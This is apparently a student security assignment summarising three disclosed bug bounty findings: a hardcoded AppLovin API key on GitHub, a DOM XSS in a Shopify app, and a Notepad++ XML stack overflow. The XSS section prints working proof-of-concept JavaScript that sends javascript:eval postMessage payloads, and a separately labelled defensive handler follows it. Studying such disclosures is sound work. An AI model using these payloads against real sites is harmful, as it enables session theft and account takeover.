Sri Lanka Institute of Information Technology
Master of Science (Information Management) Degree Program
Information and Network Security
Assignment 3
Bug bounty
W.M.J.H. Fernando
MS18901290
AppLovin API Key hardcoded in a Github repo
They found Sensitive Data Exposure in the github/mopub-android-mediation project: the AppLovin UI API key is hardcoded in the source code. The main impact is that this is a production API key, so it shouldn't be shown publicly in a Github repo; otherwise it can be used by other developers. As it is company property, and a monetization API key, it should be kept secure.
This key is used for initialization of the app, but an API key should not be disclosed publicly in a Github repo.
There are two perspectives.
Developer perspective
Every API key has a certain usage limit, and if other developers use this same key then the API key usage limit will get reduced.
Attacker perspective
An attacker can use this key to violate GDPR policy, because from May 25th 2018 AppLovin is GDPR compliant and there are certain rules which need to be followed while building the app. If an attacker got this key he would violate GDPR rules, and it would be a huge problem for the company. These are some links:
AppLovin GDPR policy links
1. https://www.applovin.com/privacy/
2. https://www.applovin.com/gdprfaqs/
Mopub GDPR Publisher Integration Guide
1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
As per the Google AppLovin SDK docs on EU consent and GDPR:
1. https://developers.google.com/admob/android/mediation/applovin
Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consents obtained from, users in the European Economic Area (EEA) regarding the use of device identifiers and personal data. This policy reflects the requirements of the EU ePrivacy Directive and the General Data Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically.
The best practice when committing code to a Github repo is not to commit your application key, because you never know when things will go wrong; the API_KEY is always company property and it shouldn't be disclosed publicly.
DOM XSS via Shopify.API.remoteRedirect
This problem found a DOM XSS on the apple-business-chat app that seems to be referring to a vulnerable js file. For users who have installed this app, just let them use the theme code I provided to complete the XSS.
Modify the theme code to the following payload.
<script>
function attack(){
  let ctx=window.open('https://apple-business-chat-commerce.shopifycloud.com'),interval;
  let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.domain)`);
  interval=setInterval(()=>{
    ctx && ctx.postMessage({
      "message":"Shopify.API.remoteRedirect",
      "data":{
        "location":`javascript:eval(atob('${payload}'))`
      }
    },location.origin);
  },500);
  window.onmessage=(e)=>{
    e.data==="success"&&(
      console.log('attack success'),
      window.onmessage=null,
      clearInterval(interval)
    );
  };
}
attack();
</script>
<a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>
As shown below
Then click on the store front page to trigger it.
Impact
Steal session information, add administrators, etc.
Another API is also affected by XSS:
postMessage({
  "message":"Shopify.API.Bar.initialize",
  "data":{
    pagination: {
      next: {
        href: "javascript:alert(document.domain)",
        target: "new"
      },
      previous: {
        href: "javascript:alert(document.domain)",
        target: "new"
      }
    }
  }
});
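Both messages above, the remoteRedirect location and the Bar.initialize pagination hrefs, share one root cause: a URL taken from postMessage data is used without checking the sender's origin or the URL scheme. As an added example (not Shopify's code or the reporter's), the following receiving-side handler rejects both; TRUSTED_ORIGINS, sanitizeUrl and handleAppMessage are assumed names and the shop origin is a constructed value.

```javascript
// Added example, not Shopify's or the reporter's code: a receiving-side
// postMessage handler for the two message shapes in the report.
// TRUSTED_ORIGINS, sanitizeUrl and handleAppMessage are assumed names;
// the shop origin below is a constructed value.
const TRUSTED_ORIGINS = new Set(["https://example-shop.myshopify.com"]);
const BASE = "https://example-shop.myshopify.com";

// Accept only http(s) URLs; "javascript:", "data:" and malformed values yield null.
function sanitizeUrl(value) {
  if (typeof value !== "string") return null;
  let url;
  try { url = new URL(value, BASE); } catch (err) { return null; }
  if (url.protocol !== "https:" && url.protocol !== "http:") return null;
  return url.href;
}

// Returns the action the page may take for a message, or null to ignore it.
function handleAppMessage(origin, msg) {
  // Origin check first: a message from any other window is dropped unread.
  if (!TRUSTED_ORIGINS.has(origin) || !msg || typeof msg !== "object") return null;
  const data = msg.data || {};
  if (msg.message === "Shopify.API.remoteRedirect") {
    const target = sanitizeUrl(data.location);
    return target === null ? null : { redirect: target };
  }
  if (msg.message === "Shopify.API.Bar.initialize") {
    // Pagination links are rendered as hrefs, so they get the same filter.
    const links = {};
    for (const key of ["next", "previous"]) {
      const entry = data.pagination && data.pagination[key];
      const href = entry ? sanitizeUrl(entry.href) : null;
      if (href !== null) links[key] = href;
    }
    return { pagination: links };
  }
  return null; // unknown message type
}

// Wiring into a page: the listener never reads e.data fields directly.
function installHandler(win) {
  win.addEventListener("message", (e) => {
    const action = handleAppMessage(e.origin, e.data);
    if (action && action.redirect) win.location.href = action.redirect;
  });
}
```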
Stack overflow in XML Parsing
Summary:
A stack buffer overflow vulnerability has been detected in XML parsing functionality on Notepad++ v7.6.2 (32 bits).
That's due to the fact that the _invisibleEditView.getText function doesn't check buffer boundaries.
Description:
Vulnerability src file: notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp
Vulnerability line: line 1008
Variable affected: char encodingStr[128];
Function that overflows buffer: _invisibleEditView.getText
Steps to Reproduce:
1. Create a .xml file with a correct XML format.
2. Introduce a big XML field that overflows the "encodingStr" buffer.
3. Open the file with Notepad++ and the application should crash.
Supporting Material/References:
BoF_example1.xml -> Exploit example
Impact
An attacker could create a malicious .xml file that triggers a stack buffer overflow on the victim's machine.
You only need to open the attached .xml file example with Notepad++ to reproduce the exploit.